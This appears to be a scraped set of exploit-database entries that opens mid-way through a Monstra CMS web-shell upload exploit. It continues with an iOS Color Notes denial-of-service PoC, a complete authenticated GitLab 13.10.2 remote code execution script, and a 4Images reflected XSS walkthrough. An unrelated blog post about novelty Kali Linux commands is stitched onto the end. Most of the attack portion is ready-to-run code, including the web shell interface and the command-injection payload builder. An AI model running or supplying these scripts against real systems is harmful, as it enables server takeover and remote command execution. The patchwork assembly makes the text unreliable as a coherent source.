}\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n"

# Exploit:
x = requests.post(url, headers=header, cookies=cookies, data=burp0_data)

# Finish:
print('')
print('Please log in in your web browser and then open the following URL:')
print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uploads/shell.phar')
print('')
-
Color Notes 1.4 - Denial of Service (PoC)
# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
# Version: 1.4
# Category: DoS (iOS)

##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:

# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2.

##### PoC #####
--> payload.py <--

#!/usr/bin/env python
buffer = "\x41" * 350000
try:
    f = open("payload.txt", "w")
    f.write(buffer)
    f.close()
    print("File created")
except:
    print("File cannot be created")
-
Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Date: 04/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.10.3
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.10.2 CE
# Credits: https://hackerone.com/reports/1154542

import requests
from bs4 import BeautifulSoup
import random
import os
import argparse

parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()

username = args.u
password = args.p
gitlab_url = args.t
command = args.c

session = requests.Session()

# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")

# payload creation
print("[2] Creating Payload ")
payload = f"\" . qx{{{command}}} . \\\n"
f1 = open("/tmp/exploit", "w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()

# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
    exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")

# Building the payload
os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')

# Uploading it
print("[3] Creating Snippet and Uploading")
# Getting the CSRF token
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
    'Accept': 'application/json',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': f'{gitlab_url}/projects',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'X-Requested-With': 'XMLHttpRequest',
    'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
r = session.post(gitlab_url + '/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
if r.text != "Failed to process image\n":
    exit("[-] Exploit failed")
else:
    print("[+] RCE Triggered !!")
-
4Images 1.8 - 'redirect' Reflected XSS
# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
# Version: 4Images Gallery 1.8
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-27308

-Description:
A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.

-Steps to reproduce:
1- Go to the 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
2- Enter the credentials, turn on the intercept and click on "Login"
3- Copy-paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
4- Forward the request and you can see the XSS is triggered.
-
Title: Those interesting commands in Kali Linux
In our opinion, Linux is the entire command line. There are many commands to implement a certain function, and it is precisely this that gives Linux a certain learning threshold. But did you know? There are also many interesting commands in Linux, and of course all Linux distributions can install and run these commands! Let's play together!

sl command
You will see a train driving from the right side of the screen to the left.
Install: sudo apt-get install sl
Run: sl
The command has several options: -alFe.
-a An accident seems to happen. You'll feel sorry for the people who cry for help.
-l Shows a little one.
-F It flies.
-e Allow interrupt by Ctrl+C.
You can prank someone with it. If he types ls, what he doesn't know will definitely take effect:
alias ls=sl

fortune command
Outputs a sentence; there are jokes, famous quotes, etc. (There are also Tang poems and Song lyrics: sudo apt-get install fortune-zh)
Install: sudo apt-get install fortune
Run: fortune

cowsay command
Uses ASCII characters to print cows, sheep and other animals; there is also cowthink. One is the cow thinking and the other is the cow saying, haha, they are almost the same.
Install: sudo apt-get install cowsay
Run: cowsay 'Big Cousin, awesome 666'
cowsay -l lists the names of the other animals; then use -f followed by the animal's name, such as cowsay -f tux 'Take it'
You can also let cowsay say the content of fortune, like this: fortune | cowsay

cmatrix command
This is cool! The Matrix-style animation effect.
Install: sudo apt-get install cmatrix
Run: cmatrix

figlet, toilet command
Word art generators composed of ASCII characters; they display the text as a title bar. There is also the banner command.
Install: sudo apt-get install figlet
Install: sudo apt-get install toilet
Run: figlet bbskali.cn !
Run: toilet bbskali.cn
toilet can also add colors. Please look at its options yourself: toilet -f mono12 -F bbskali.cn

oneko command
A cat appears on the desktop, following your mouse, and it goes to sleep if you don't move. Haha, this is pretty good.
Install: $ sudo apt-get install oneko
Run: oneko
If you want to turn this guy off, press ctrl+c to end it.

xeyes command
A pair of eyes appear on the screen, staring at your mouse pointer. Installation and operation are as above.

yes command
Outputs endless characters; press ctrl+c to end, for example: yes I'm very NB

cal 9 1752
cal prints a calendar, but this is a very weird month.

shred
Overwrites files with garbage, which amounts to shredding the documents. Haha, if you want to destroy the blockbuster seeds and movies you have hidden privately, you will rely on it.